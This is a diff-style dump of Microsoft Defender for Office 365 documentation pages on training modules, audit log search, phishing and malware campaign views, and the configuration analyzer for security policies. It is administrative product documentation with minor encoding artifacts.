-To find a Training module in the list, type the name of the module in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box, and then press the ENTER key.
-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to filter the information on the page. The following filters are available in the flyout that opens:
--- **Source**-- **Language**-- **Add Tags**-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-When you select a Training module from the list by clicking anywhere in the row other than the check box next to the name, a details flyout appears with the following information:
--- **Description**-- **Source**-- **Languages**-- **Duration**-- **Preview**: Select this button to watch the training.-- **Tags**--- **Active Training campaigns and simulations**: This section shows the following information about active Training campaigns that are using the selected module:
- - **Name**
- - **Type**
- - **Status**
- - **End by**
-
-> [!TIP]
-> To see details about other training modules without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
security Audit Log Search Defender Portal https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/audit-log-search-defender-portal.md
- Title: Audit log search in the Microsoft Defender portal
- - NOCSH
-----
- - m365-security
- - tier2
-
- - seo-marvel-apr2020
-description: Admins can use the Audit page in the Microsoft Defender portal to search the unified audit log for user and admin actions in the organization.
- Previously updated : 10/9/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Audit log search in the Microsoft Defender portal
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, the unified audit log records supported user and admin operations. Audit records for these events are searchable by security ops, IT admins, insider risk teams, and compliance and legal investigators in the organization. This capability provides visibility into the activities performed across your Microsoft 365 organization.
-
-> [!TIP]
-> Audit log search in Microsoft Defender portal is identical to audit log search in the Microsoft Purview compliance portal at <https://compliance.microsoft.com/auditlogsearch>.
-
-## What do you need to know before you begin?
--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Exchange Online permissions](/exchange/permissions-exo/permissions-exo): Membership in the **Organization Management** or **Compliance Management** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator** or **Compliance Administrator** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
-
-## Open audit log search
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Audit**. Or, to go directly to the **Audit** page, use <https://security.microsoft.com/auditlogsearch>.
-
-On the **Audit** page, create the audit log search. For instructions, see the following articles:
--- [Audit New Search](/purview/audit-new-search)-- [Use a PowerShell script to search the audit log](/purview/audit-log-search-script)
security Campaigns https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/campaigns.md
- Title: Campaigns in Microsoft Defender for Office 365 Plan
- - NOCSH
-----
- - MET150
-
- - m365-security
- - tier1
-
-description: Learn about Campaigns in Microsoft Defender for Office 365.
- Previously updated : 2/20/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Campaigns in Microsoft Defender for Office 365
--
-In Microsoft 365 organizations with Microsoft Defender for Office 365 Plan 2, the _campaigns_ feature identifies and categorizes coordinated phishing and malware email attacks. Microsoft's categorization of email attacks into discrete campaigns helps you to:
--- Efficiently investigate and respond to email attacks.-- Better understand the scope of the email attack that's targeting your organization.-- Show the value of Microsoft Defender for Office 365 to decision makers in preventing email threats.-
-The campaigns feature lets you see the overall picture of an email attack faster and more completely than any human.
-
-Watch this short video on how campaigns in Microsoft Defender for Office 365 help you understand coordinated email attacks that target your organization.
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RWGBL8]
-
-## What is a campaign?
-
-A campaign is a coordinated email attack against one or many organizations. Email attacks that steal credentials and company data are a large and lucrative industry. As technologies increase to stop attacks, attackers modify their methods to ensure continued success.
-
-Microsoft applies the vast amounts of anti-phishing, anti-spam, and anti-malware data from the entire service to identify campaigns. We analyze and classify the attack information according to several factors. For example:
--- **Attack source**: The source IP addresses and sender email domains.-- **Message properties**: The content, style, and tone of the messages.-- **Message recipients**: How recipients are related. For example, recipient domains, recipient job functions (admins, executives, etc.), company types (large, small, public, private, etc.), and industries.-- **Attack payload**: Malicious links, attachments, or other payloads in the messages.-
-A campaign might be short-lived, or could span several days, weeks, or months with active and inactive periods. A campaign might be launched against your organization specifically, or your organization might be part of a larger campaign across multiple companies.
-
-## Required licenses and permissions
--- The campaigns feature is available in organizations with Defender for Office 365 Plan 2 (add-on licenses or included in subscriptions like Microsoft 365 E5).-- You need to be assigned permissions to view information about campaigns as described in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Security operations/Raw data (email & collaboration)/Email message headers (read)**.
- - [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md): Membership in the **Organization Management**, **Security Administrator**, or **Security Reader** role group.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, or **Security Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
-
-## Campaigns page in the Microsoft Defender portal
-
-To open the **Campaigns** page in the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Campaigns**. Or, to go directly to the **Campaigns** page, use <https://security.microsoft.com/campaigns>.
-
-The **Campaigns** page consists of the following elements:
--- A filter/query builder at the top of the page.-- A chart area where you can use the available pivots to organize the chart in different ways. By default, the chart uses the **Campaign Type** pivot, even though that pivot doesn't appear to be selected.-- A details area, which is set to the **Campaign** tab by default--
-> [!TIP]
->
-> - If you don't see any campaign data or very limited data, try changing the date range or [filters](#filters-on-the-campaigns-page).
->
-> - You can also view the same information about campaigns in [Threat Explorer](threat-explorer-real-time-detections-about.md) at <https://security.microsoft.com/threatexplorerv3>:
-> - **Campaigns** view.
-> - **All email** view \> **Campaign** tab in the details area below the chart.
-> - **Malware** view \> **Campaign** tab in the details area below the chart.
-> - **Phish** view \> **Campaign** tab in the details area below the chart.
->
-> - If you have a Microsoft Defender for Endpoint subscription, campaigns information is connected with Microsoft Defender for Endpoint.
-
-### Chart area on the Campaigns page
-
-On the **Campaigns** page, the chart area shows a bar graph that shows the number of recipients per day. By default, the graph shows both **Malware** and **Phish** data.
-
-To filter the information that's shown in the chart and in the details table, change the [filters](#filters-on-the-campaigns-page).
-
-Change the organization of the chart by selecting **Campaign Type**, and then selecting one of the following values in the dropdown list:
--- **Campaign Name**-- **Campaign Subtype**-- **Sender domain**-- **Sender IP**-- **Delivery action**-- **Detection technology**-- **Full URL**-- **URL domain**-- **URL domain and path**-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export chart data** to export the data in the chart to a CSV file.
-
-To remove the chart from the page (which maximizes the size of the details area), do either of the following steps:
--- Select :::image type="icon" source="../../media/m365-cc-sc-chart-view-icon.png" border="false"::: **Chart View** \> :::image type="icon" source="../../media/m365-cc-sc-list-view-icon.png" border="false"::: **List View** at the top of the page.-- Select :::image type="icon" source="../../media/m365-cc-sc-show-list-view-icon.png" border="false"::: **Show list view** between the chart and the views for the details table.-
-### Details area on the Campaigns page
-
-To filter the information that's shown in the chart and in the details table, change the [filters](#filters-on-the-campaigns-page).
-
-On the **Campaigns** page, the **Campaign** tab below the chart shows the following information in the details table:
--- **Name**-- **Sample subject**: The subject line of one of the messages in the campaign. All messages in the campaign don't necessarily have the same subject.-- **Targeted**: The percentage as calculated by: (the number of campaign recipients in your organization) / (the total number of recipients in the campaign across all organizations in the service). This value indicates the degree to which the campaign is directed only at your organization (a higher value) vs. also directed at other organizations in the service (a lower value).-- **Type**: The value is either **Phish** or **Malware**.-- **Subtype**: The value contains more details about the campaign. For example:
- - **Phish**: Where available, the brand that is being phished by this campaign. For example, `Microsoft`, `365`, `Unknown`, `Outlook`, or `DocuSign`. When the detection is driven by Defender for Office 365 technology, the prefix **ATP-** is added to the subtype value.
- - **Malware**: For example, `W32/<MalwareFamilyName>` or `VBS/<MalwareFamilyName>`.
-- **Tags**: For more information about user tags, see [User tags](user-tags-about.md).-- **Recipients**: The number of users that were targeted by this campaign.-- **Inboxed**: The number of users that received messages from this campaign in their Inbox (not delivered to their Junk Email folder).-- **Clicked**: The number of users that selected the URL or opened the attachment in the phishing message.-- **Click rate**: In phishing campaigns, the percentage as calculated by "**Clicked** / **Inboxed**". This value is an indicator of the effectiveness of the campaign. In other words, were the recipients able to identify the message as phishing, and therefore avoided the payload URL? **Click rate** isn't used in malware campaigns.-- **Visited**: How many users actually made it through to the payload website. If there are **Clicked** values, but [Safe Links](safe-links-about.md) blocked access to the website, this value is zero.-
-Select a column header to sort by that column. To remove columns, select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns**. By default, all available columns are selected.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the data in the details table to a CSV file.
-
-On the **Campaigns** page, the **Campaign origin** tab below the chart shows the message sources on a map of the world.
-
-### Filters on the Campaigns page
-
-At the top of the **Campaign** page, there are several filter settings to help you find and isolate specific campaigns. The filters you select affect the chart and the details table.
-
-By default, the view is filtered by yesterday and today. To change the date filter, select the date range, and then select **Start Date** and **End date** values up to 30 days ago.
--
-You can also filter the results by one or more message or campaign properties. The basic syntax is:
-
-\<Property\> \<**Equal any of** \| **Equal none of**\> \<Property value or values\>
--- Select the message or campaign property from the **Campaign Type** dropdown list (**Campaign Type** is the default value that's selected).-- The property values that you need to enter are completely dependent on the property. Some properties allow freeform text with multiple values separated by commas, and some properties allow multiple values selected from a list.-
-The available properties and their associated values are described in the following table:
-
-|Property|Type|
-|||
-|**Basic**||
-|Campaign Type|Select one or more values┬╣: <ul><li>**Malware**</li><li>**Phish**</li></ul>|
-|Campaign Name|Text. Separate multiple values by commas.|
-|Campaign Subtype|Text. Separate multiple values by commas.|
-|Sender address|Text. Separate multiple values by commas.|
-|Recipients|Text. Separate multiple values by commas.|
-|Sender domain|Text. Separate multiple values by commas.|
-|Recipient domain|Text. Separate multiple values by commas.|
-|Subject|Text. Separate multiple values by commas.|
-|Sender display name|Text. Separate multiple values by commas.|
-|Sender mail from address|Text. Separate multiple values by commas.|
-|Sender mail from domain|Text. Separate multiple values by commas.|
-|Malware family|Text. Separate multiple values by commas.|
-|Tags|Text. Separate multiple values by commas. <br/><br/> For more information about user tags, see [User tags](user-tags-about.md).|
-|Delivery action|Select one or more values┬╣: <ul><li>**Blocked**</li><li>**Delivered**</li><li>**Delivered to junk**</li><li>**Replaced**</li></ul>|
-|Additional action|Select one or more values┬╣: <ul><li>**Automated remediation**</li><li>**Dynamic Delivery**: For more information, see [Dynamic Delivery in Safe Attachments policies](safe-attachments-about.md#dynamic-delivery-in-safe-attachments-policies).</li><li>**Manual remediation**</li><li>**None**</li><li>**Quarantine release**</li><li>**Reprocessed**</li><li>**ZAP**: For more information, see [Zero-hour auto purge (ZAP) in Microsoft Defender for Office 365](zero-hour-auto-purge.md).</li></ul>|
-|Directionality|Select one or more values┬╣: <ul><li>**Inbound**</li><li>**Intra-irg**</li><li>**Outbound**</li></ul>|
-|Detection technology|Select one or more values┬╣: <ul><li>**Advanced filter**: Signals based on machine learning.</li><li>**Antimalware protection**</li><li>**Bulk**</li><li>**Campaign**</li><li>**Domain reputation**</li><li>**File detonation**: [Safe Attachments](safe-attachments-about.md) detected a malicious attachment during detonation analysis.</li><li>**File detonation reputation**: File attachments previously detected by [Safe Attachments](safe-attachments-about.md) detonations in other Microsoft 365 organizations.</li><li>**File reputation**: The message contains a file that was previously identified as malicious in other Microsoft 365 organizations.</li><li>**Fingerprint matching**: The message closely resembles a previous detected malicious message.</li><li>**General filter**</li><li>**Impersonation brand**: Sender impersonation of well-known brands.</li><li>**Impersonation domain**: Impersonation of sender domains that you own or specified for protection in [anti-phishing policies](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365)</li><li>**Impersonation user**</li><li>**IP reputation**</li><li>**Mailbox intelligence impersonation**: Impersonation detections from mailbox intelligence in [anti-phishing policies](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365).</li><li>**Mixed analysis detection**: Multiple filters contributed to the message verdict.</li><li>**spoof DMARC**: The message failed [DMARC authentication](email-authentication-dmarc-configure.md).</li><li>**Spoof external domain**: Sender email address spoofing using a domain that's external to your organization.</li><li>**Spoof intra-org**: Sender email address spoofing using a domain that's internal to your organization.</li><li>**URL detonation**: [Safe Links](safe-links-about.md) detected a malicious URL in the message during detonation analysis.</li><li>**URL detonation reputation**</li><li>**URL malicious reputation**: URLs previously detected by [Safe Links](safe-links-about.md) detonations in other Microsoft 365 organizations.</li></ul>|
-|Original delivery location|Select one or more values┬╣: <ul><li>**Deleted Items folder**</li><li>**Dropped**</li><li>**Failed**</li><li>**Inbox/folder**</li><li>**Junk folder**</li><li>**On-prem/external**</li><li>**Quarantine**</li><li>**Unknown**</li></ul>|
-|Latest delivery location|Same values as **Original delivery location**</li></ul>|
-|System overrides|Select one or more values┬╣: <ul><li>**Allowed by user policy**</li><li>**Blocked by user policy**</li><li>**Allowed by organization policy**</li><li>**Blocked by organization policy**</li><li>**File extension blocked by organization policy**</li><li>**None**</li></ul>|
-|System override source|Select one or more values┬╣: <ul><li>**3rd party filter**</li><li>**Admin initiated time travel** (ZAP)</li><li>**Anti-malware policy block by file type**</li><li>**Anti-spam policy settings**</li><li>**Connection policy**</li><li>**Exchange transport rule** (mail flow rule)</li><li>**Filtering skipped due to on-prem organization**</li><li>**IP region filter from policy**</li><li>**Language filter from policy**</li><li>**Phishing simulation**</li><li>**Quarantine release**</li><li>**SecOPs mailbox**</li><li>**Sender address list (admin override)**</li><li>**Sender address list (user override)**</li><li>**Sender domain list (admin override)**</li></ul>|
-|**Advanced**||
-|Internet Message ID|Text. Separate multiple values by commas. <br/><br/> Available in the **Message-ID** header field in the message header. An example value is `<08f1e0f6806a47b4ac103961109ae6ef@server.domain>` (note the angle brackets).|
-|Network Message ID|Text. Separate multiple values by commas. <br/><br/> A GUID value that's available in the **X-MS-Exchange-Organization-Network-Message-Id** header field in the message header.|
-|Sender IP|Text. Separate multiple values by commas.|
-|Attachment SHA256|Text. Separate multiple values by commas. <br/><br/> To find the SHA256 hash value of a file in Windows, run the following command in a Command Prompt: `certutil.exe -hashfile "<Path>\<Filename>" SHA256`.|
-|Cluster ID|Text. Separate multiple values by commas.|
-|Alert ID|Text. Separate multiple values by commas.|
-|Alert Policy ID|Text. Separate multiple values by commas.|
-|Campaign ID|Text. Separate multiple values by commas.|
-|ZAP URL signal|Text. Separate multiple values by commas.|
-|**Urls**||
-|URL domain|Text. Separate multiple values by commas.|
-|URL domain and path|Text. Separate multiple values by commas.|
-|URL|Text. Separate multiple values by commas.|
-|URL path|Text. Separate multiple values by commas.|
-|Click verdict|Select one or more values┬╣: <ul><li>**Allowed**</li><li>**Block overridden**</li><li>**Blocked**</li><li>**Error**</li><li>**Failure**</li><li>**None**</li><li>**Pending verdict**</li><li>**Pending verdict bypassed**</li></ul>|
-|**File**||
-|Attachment filename|Text. Separate multiple values by commas.|
-
-┬╣ Not using this property filter or using this property filter with no values selected has the same result as using this property filter with all values selected.
-
-After you select a property from the **Campaign Type** dropdown, select **Equal any of** or **Not equal any of**, and then enter or select a value in the property box, the filter query appears below the filter area.
--
-To add more conditions, select another property/value pair, and then select **AND** or **OR**. Repeat these steps as many times as necessary.
-
-To remove existing property/value pairs, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the entry.
-
-When you're finished building your filter query, select **Refresh**.
-
-To save your filter query, select **Save query** \> :::image type="icon" source="../../media/m365-cc-sc-save-icon.png" border="false"::: **Save query**. In the **Save query** flyout that opens, configure the following settings:
--- **Query name**: Enter a unique value.-- Select one of the following values:
- - **Exact dates**: Select the date range.
- - **Relative dates**: Select from one to 30 days.
-- **Track this query**-
-When you're finished in the **Save query** flyout, select **Save**, and then select **OK** in the confirmation dialog.
-
-When you return to the **Campaigns** page, you can load a saved filter by selecting **Save query** \> :::image type="icon" source="../../media/m365-cc-sc-gear-icon.png" border="false"::: **Saved query settings**.
-
-## Campaign details
-
-When you select an entry from the details table by clicking anywhere in the row other than the check box next to the name, a flyout opens that contains details about the campaign.
-
-What's shown in the campaign details flyout is described in the following subsections.
-
-### Campaign information
-
-At the top of the campaign details flyout, the following campaign information is available:
--- **Campaign ID**: The unique campaign identifier.-- **Activity**: The duration and activity of the campaign.-- The following data for the date range filter you selected (or that you select in the timeline):
- - **Impact**
- - **Messages**: The total number of recipients.
- - **Inboxed**: The number of messages that were delivered to the Inbox, not to the Junk Email folder.
- - **Clicked link**: How many users selected the payload URL in the phishing message.
- - **Visited link**: How many users visited the URL.
- - **Targeted(%)**: The percentage as calculated by: (the number of campaign recipients in your organization) / (the total number of recipients in the campaign across all organizations in the service). This value is calculated over the entire lifetime of the campaign, and isn't changed by date filters.
-- Start date/time and end data/time filters for the campaign flow as described in the next section.-- An interactive timeline of campaign activity: The timeline shows activity over the entire lifetime of the campaign. You can hover over the data points in the graph to see the number of detected messages.--
-### Campaign flow
-
-In the middle of the campaign details flyout, important details about the campaign are presented in a horizontal flow diagram (known as a _Sankey_ diagram). These details help you to understand the elements of the campaign and the potential impact in your organization.
-
-> [!TIP]
-> The information that's displayed in the flow diagram is controlled by the date range filter in the timeline as described in the previous section.
--
-If you hover over a horizontal band in the diagram, you see the number of related messages (for example, messages from a particular source IP, messages from the source IP using the specified sender domain, etc.).
-
-The diagram contains the following information:
--- **Sender IPs**-- **Sender domains**-- **Filter verdicts**: Verdict values are related to the available phishing and spam filtering verdicts as described in [Anti-spam message headers](message-headers-eop-mdo.md). The available values are described in the following table:-
- |Value|Spam filter verdict|Description|
- ||||
- |**Allowed**|`SFV:SKN` <br/><br/ `SFV:SKI`|The message was marked as not spam and/or skipped filtering before being evaluated by spam filtering. For example, the message was marked as not spam by a mail flow rule (also known as a transport rule). <br/><br/ The message skipped spam filtering for other reasons. For example, the sender and recipient appear to be in the same organization.|
- |**Blocked**|`SFV:SKS`|The message was marked as spam before being evaluated by spam filtering. For example, by a mail flow rule.|
- |**Detected**|`SFV:SPM`|The message was marked as spam by spam filtering.|
- |**Not Detected**|`SFV:NSPM`|The message was marked as not spam by spam filtering.|
- |**Released**|`SFV:SKQ`|The message skipped spam filtering because it was released from quarantine.|
- |**Tenant Allow**┬╣|`SFV:SKA`|The message skipped spam filtering because of the settings in an anti-spam policy. For example, the sender was in the allowed senders list or allowed domain list.|
- |**Tenant Block**┬▓|`SFV:SKA`|The message was blocked by spam filtering because of the settings in an anti-spam policy. For example, the sender was in the allowed senders list or allowed domain list.|
- |**User Allow**┬╣|`SFV:SFE`|The message skipped spam filtering because the sender was in a user's Safe Senders list.|
- |**User Block**┬▓|`SFV:BLK`|The message was blocked by spam filtering because the sender was in a user's Blocked Senders list.|
- |**ZAP**|n/a|[Zero-hour auto purge (ZAP)](zero-hour-auto-purge.md) moved the delivered message to the Junk Email folder or quarantine. You configure the action in [anti-spam policies](anti-spam-policies-configure.md).|
-
- ┬╣ Review your anti-spam policies, because the allowed message would have likely been blocked by the service.
-
- ┬▓ Review your anti-spam policies, because these messages should be quarantined, not delivered.
--- **Message destinations**: Investigate messages that were delivered to recipients (either to the Inbox or the Junk Email folder), even if users didn't select the payload URL in the message. You can also remove the quarantined messages from quarantine. For more information, see [Quarantined email messages in EOP](quarantine-about.md).
- - **Deleted folder**
- - **Dropped**
- - **External**: The recipient is located in your on-premises email organization in hybrid environments.
- - **Failed**
- - **Forwarded**
- - **Inbox**
- - **Junk folder**
- - **Quarantine**
- - **Unknown**
-- **URL clicks**: These values are described in the next section.-
-> [!NOTE]
-> In all layers that contain more than 10 items, the top 10 items are shown, while the rest are bundled together in **Others**.
-
-#### URL clicks
-
-When a phishing message is delivered to a recipient's Inbox or Junk Email folder, there's always a chance that the user will select the payload URL. Not selecting the URL is a small measure of success, but you need to determine why the phishing message was delivered to the mailbox in the first place.
-
-If a user selected the payload URL in the phishing message, the actions are displayed in the **URL clicks** area of the diagram in the campaign details view.
--- **Allowed**-- **BlockPage**: The recipient selected the payload URL, but their access to the malicious website was blocked by a [Safe Links](safe-links-about.md) policy in your organization.-- **BlockPageOverride**: The recipient selected the payload URL in the message, Safe Links tried to stop them, but they were allowed to override the block. Inspect your [Safe Links policies](safe-links-policies-configure.md) to see why users are allowed to override the Safe Links verdict and continue to the malicious website.-- **PendingDetonationPage**: Safe Attachments in Microsoft Defender for Office 365 is opening and investigating the payload URL in a virtual environment.-- **PendingDetonationPageOverride**: The recipient was allowed to override the payload detonation process and open the URL without waiting for the results.-
-### Tabs
-
-> [!TIP]
-> The information that's displayed on the tabs is controlled by the date range filter in the campaign details flyout as described in the [Campaign information](#campaign-information) section.
-
-The tabs in the campaign details flyout allow you to further investigate the campaign. The following tabs are available:
--- **URL clicks**: If users didn't select the payload URL in the message, this section is blank. If a user was able to select the URL, the following values are populated:
- - **User**<sup>\*</sup>
- - **Tags**
- - **URL**<sup>\*</sup>
- - **Click time**
- - **Click verdict**
--- **Sender IPs**
- - **Sender IP**<sup>\*</sup>
- - **Total count**
- - **Inboxed**
- - **Not Inboxed**
- - **SPF passed**: The sender was authenticated by the [Sender Policy Framework (SPF)](email-authentication-spf-configure.md). A sender that doesn't pass SPF validation indicates an unauthenticated sender, or the message is spoofing a legitimate sender.
--- **Senders**
- - **Sender**: This is the actual sender address in the SMTP **MAIL FROM** command, which isn't necessarily the **From:** email address that users see in their email clients.
- - **Total count**
- - **Inboxed**
- - **Not Inboxed**
- - **DKIM passed**: The sender was authenticated by [Domain Keys Identified Mail (DKIM)](email-authentication-dkim-configure.md). A sender that doesn't pass DKIM validation indicates an unauthenticated sender, or the message is spoofing a legitimate sender.
- - **DMARC passed**: The sender was authenticated by [Domain-based Message Authentication, Reporting, and Conformance (DMARC)](email-authentication-dmarc-configure.md). A sender that doesn't pass DMARC validation indicates an unauthenticated sender, or the message is spoofing a legitimate sender.
--- **Attachments**
- - **Filename**
- - **SHA256**
- - **Malware family**
- - **Total count**
--- **URLs**
- - **URL**<sup>\*</sup>
- - **Total Count**
-
-<sup>\*</sup> Selecting this value opens a new flyout that contains more details about the specified item (user, URL, etc.) on top of the campaign details view. To return to the campaign details flyout, select **Done** in the new flyout.
-
-On each tab, select a column header to sort by that column. To remove columns, select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns**. By default, all available columns on each tab are selected.
-
-### Additional actions
-
-The actions at the bottom the campaign details flyout allow you to investigate and record details about the campaign:
--- Select **Yes** or **No** in **Do you think this campaign has accurately grouped these messages together?**.-- **Explore messages**: Use the power of Threat Explorer to further investigate the campaign by selecting one of the following values in the dropdown list:
- - **All messages**: Opens a new Threat Explorer search tab using the **Campaign ID** value as the search filter.
- - **Inboxed messages**: Opens a new Threat Explorer search tab using the **Campaign ID** and **Delivery location: Inbox** as the search filter.
- - **Internal messages**: Opens a new Threat Explorer search tab using the **Campaign ID** and **Directionality: Intra-org** as the search filter.
-- **Download threat report**: Download the campaign details to a Word document (by default, named CampaignReport.docx). The download contains details over the entire lifetime of the campaign (not just the date filter you selected).
security Configuration Analyzer For Security Policies https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/configuration-analyzer-for-security-policies.md
- Title: Configuration analyzer for security policies
- - NOCSH
-----
- - MET150
-
- - m365-security
- - tier1
-
-description: Admins can learn how to use the configuration analyzer to find and fix security policies that are less secure than Standard protection and Strict protection in preset security policies.
- Previously updated : 1/29/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Configuration analyzer for protection policies in EOP and Microsoft Defender for Office 365
--
-Configuration analyzer in the Microsoft Defender portal provides a central location to find and fix security policies where the settings are less secure than the Standard protection and Strict protection profile settings in [preset security policies](preset-security-policies.md).
-
-The following types of policies are analyzed by the configuration analyzer:
--- **Exchange Online Protection (EOP) policies**: Includes Microsoft 365 organizations with Exchange Online mailboxes and standalone EOP organizations without Exchange Online mailboxes:
- - [Anti-spam policies](anti-spam-policies-configure.md).
- - [Anti-malware policies](anti-malware-policies-configure.md).
- - [EOP anti-phishing policies](anti-phishing-policies-about.md#spoof-settings).
--- **Microsoft Defender for Office 365 policies**: Includes organizations with Microsoft 365 E5 or Defender for Office 365 add-on subscriptions:
- - Anti-phishing policies in Microsoft Defender for Office 365, which include:
- - The same [spoof settings](anti-phishing-policies-about.md#spoof-settings) that are available in the EOP anti-phishing policies.
- - [Impersonation settings](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365)
- - [Advanced phishing thresholds](anti-phishing-policies-about.md#advanced-phishing-thresholds-in-anti-phishing-policies-in-microsoft-defender-for-office-365)
- - [Safe Links policies](safe-links-policies-configure.md).
- - [Safe Attachments policies](safe-attachments-policies-configure.md).
-
-The Standard and Strict policy setting values that are used as baselines are described in [Recommended settings for EOP and Microsoft Defender for Office 365 security](recommended-settings-for-eop-and-office365.md).
-
-The configuration analyzer also checks the following non-policy settings:
--- **DKIM**: Whether [SPF](email-authentication-spf-configure.md) and [DKIM](email-authentication-dkim-configure.md) records for the specified domain are detected in DNS.-- **Outlook**: Whether native Outlook external sender identifiers are [enabled](/powershell/module/exchange/set-externalinoutlook) in the organization.-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Configuration analyzer** page, use <https://security.microsoft.com/configurationAnalyzer>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.
- - [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md):
- - _Use the configuration analyzer and update the affected security policies_: Membership in the **Organization Management** or **Security Administrator** role groups.
- - _Read-only access to the configuration analyzer_: Membership in the **Global Reader** or **Security Reader** role groups.
- - [Exchange Online permissions](/Exchange/permissions-exo/permissions-exo): Membership in the **View-Only Organization Management** role group gives read-only access to the configuration analyzer.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, **Global Reader**, or **Security Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
-
-## Use the configuration analyzer in the Microsoft Defender portal
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Configuration analyzer** in the **Templated policies** section. To go directly to the **Configuration analyzer** page, use <https://security.microsoft.com/configurationAnalyzer>.
-
-The **Configuration analyzer** page has three main tabs:
--- **Standard recommendations**: Compare your existing security policies to the Standard recommendations. You can adjust your settings values to bring them up to the same level as Standard.-- **Strict recommendations**: Compare your existing security policies to the Strict recommendations. You can adjust your settings values to bring them up to the same level as Strict.-- **Configuration drift analysis and history**: Audit and track policy changes over time.-
-### Standard recommendations and Strict recommendations tabs in the configuration analyzer
-
-By default, the configuration analyzer opens on the **Standard recommendations** tab. You can switch to the **Strict recommendations** tab. The settings, layout, and actions are the same on both tabs.
--
-The first section of the tab displays the number of settings in each type of policy that need improvement as compared to Standard or Strict protection. The types of policies are:
--- **Anti-spam**-- **Anti-phishing**-- **Anti-malware**-- **Safe Attachments** (if your subscription includes Microsoft Defender for Office 365)-- **Safe Links** (if your subscription includes Microsoft Defender for Office 365)-- **DKIM**-- **Built-in Protection** (if your subscription includes Microsoft Defender for Office 365)-- **Outlook**-
-If a policy type and number isn't shown, then all of your policies of that type meet the recommended settings of Standard or Strict protection.
-
-The rest of the tab is the table of settings that need to be brought up to the level Standard or Strict protection. The table contains the following columns<sup>\*</sup>:
--- **Recommendations**: The value of the setting in the Standard or Strict protection profile.-- **Policy**: The name of the affected policy that contains the setting.-- **Policy group/setting name**: The name of the setting that requires your attention.-- **Policy type**: Anti-spam, Anti-phishing, Anti-malware, Safe Links, or Safe Attachments.-- **Current configuration**: The current value of the setting.-- **Last modified**: The date that the policy was last modified.-- **Status**: Typically, this value is **Not started**.-
-<sup>\*</sup> To see all columns, you likely need to do one or more of the following steps:
--- Horizontally scroll in your web browser.-- Narrow the width of appropriate columns.-- Zoom out in your web browser.-
